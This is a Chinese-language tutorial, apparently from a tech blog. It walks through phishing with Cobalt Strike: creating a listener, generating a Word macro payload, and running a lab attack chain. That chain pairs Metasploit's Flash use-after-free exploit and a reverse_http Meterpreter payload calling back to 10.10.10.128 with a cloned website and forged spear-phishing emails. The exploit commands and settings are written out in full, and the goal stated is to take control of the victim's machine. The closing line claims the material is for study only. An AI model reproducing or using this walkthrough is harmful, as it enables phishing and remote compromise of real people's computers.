首頁>技術>

​網上有關於office巨集病毒的釣魚文章,生成的巨集病毒很容易被殺軟隔離,我們先簡單介紹下這種方式的運用,如下是利用office巨集進行釣魚的流程:

首先,在cobalt strike中需要建立一個監聽器:

在Listeners中,選擇add建立監聽

我們在建立監聽的時候會發現有多種 payload 供選擇。其中 foreign 指外部監聽,beacon指cobalt strike內部監聽,其他的型別根據http和https以及smb等自行可以選擇,看你主要用到哪種。

這裡,我們建立如下監聽:host和port指cobalt strike的伺服器地址和監聽埠,這裡因為我只部署了一臺cobalt strike團隊伺服器,固選擇部署的這臺即可,埠可以給非佔用的任意埠。

下面我們來生成一個巨集病毒,如圖所示:

在cobalt strike中生成利用程式木馬等在attackes->Packages選項中。以下是每個選項的作用:

HTML Application:生成惡意的HTA木馬檔案​MS Office Macro:生成office巨集病毒檔案​Payload Generator:生成各種語言版本的payload​USB/CD AutoPlay:生成利用自動播放執行的木馬檔案​ Windows Dropper:捆綁器,能夠對文件類進行捆綁​ Windows Executable:生成可執行exe木馬​ Windows Executable(S):生成無狀態的可執行exe木馬 

選擇MS Office Macro選項,生成巨集病毒。Listener選擇我們第一步建立的監聽連結

啟用office,在office中檢視模組選擇巨集,如圖所示:

建立一個巨集,如圖所示:

將生成的巨集程式碼,複製到office巨集中,如圖所示:

儲存該檔案,儲存的型別選擇啟用的巨集Word文件。(office巨集預設是關閉的)

發現生成的該檔案很容易被殺軟監測出來,並處理掉,加上它的侷限性,在外網實際中意義不大,在內網用用效果可能還好。這裡給大家推薦一篇TideSec安全團隊寫的一篇文章,裡面有說到利用巨集建立永續性後門,這裡就不贅述了。連結地址:https://mp.weixin.qq.com/s/lhg71lVHfp9PY1m8sYXA_A

那麼下面給大家介紹一種可能實際用到的方式:

實驗準備階段:

電腦虛擬機器搭建的郵件伺服器地址:10.10.10.133

Cobalt strike團隊伺服器地址:10.10.10.128

Kali虛擬機器地址:10.10.10.128

這裡我們應用到一個flash外掛漏洞的payloads:adobe_flash_hacking_team_uaf

通過cobalt strike結合metasploit進行實驗,如下:

通過kali啟用metasploit。配置如下資訊:

use exploit/multi/browser/adobe_flash_hacking_team_uaf set payload windows/meterpreter/reverse_httpset lhost 10.10.10.128set lport 80set disablepayloadhandler trueset prependmigrate trueexploit –j

執行後如圖所示,會得到一個利用地址,記錄該地址:

http://10.10.10.128:8080/Iw9ycnRjSC

接下來為了方便釣魚郵件的內容偽造的真實,我們通過cobalt strike克隆一個網站。

如圖所示,進入Web-Drive-by選項選擇Clone Site。這裡說明一下每個選項的含義:

Manage:對開啟的web服務進行管理​ Clone Site:克隆網站,可以記錄受害者提交的資料​ Host File:提供一個檔案下載,可以修改Mime資訊​ Signed Applet Attack:使用java自簽名的程式進行釣魚攻擊​ Smart Applet Attack:自動檢測java版本並進行攻擊,針對Java 1.6.0_45以下以及Java 1.7.0_21以下版本​ System Profiler:用來獲取一些系統資訊,比如系統版本,Flash版本,瀏覽器版本等

配置資訊如下:

其中attack就是我們metasploit中生成的地址連結

如圖是我們克隆出來的百度連結:

這裡返回了利用flash外掛漏洞生成的一個克隆連結。現在我們進行郵件偽造。

1、kali下建立目標清單:leafpad targets.txt

注意中間的紅線用TAB鍵進行分割,這裡的test是姓名。可以是多個郵件地址,每一行一個郵件地址,用TAB鍵分割。後半部分是姓名。

2、建立一個釣魚模板:使用自己的網路郵箱,show original顯示原始碼,這就是我們的“釣魚”模板。將內容複製到剪貼簿,cat >rsa.template,右鍵paste貼上。

QQ的郵箱在顯示郵件原文可以看到原始碼。Foxmail可以在更多選項中的檢視原始碼找到。如圖所示:

在cobalt strike中選擇attack->spear Phish

郵件傳送成功,如果客戶端存在flash漏洞,等待點選郵件模板裡的連結即可跳轉到我們的http://10.10.10.128/search地址,並通過flash漏洞,獲取到該終端的許可權,該終端會成功上線。

注意:因為郵件伺服器和CS團隊伺服器都是我在本地虛擬機器搭建的,不在公網上的。所以暫時未模擬到真實郵件。

本文只用於學習研究,請勿用作其他非法用途

  • BSA-TRITC(10mg/ml) TRITC-BSA 牛血清白蛋白改性標記羅丹明
  • 小白初學Python詳細420集教程!從入門到精通,附Python教程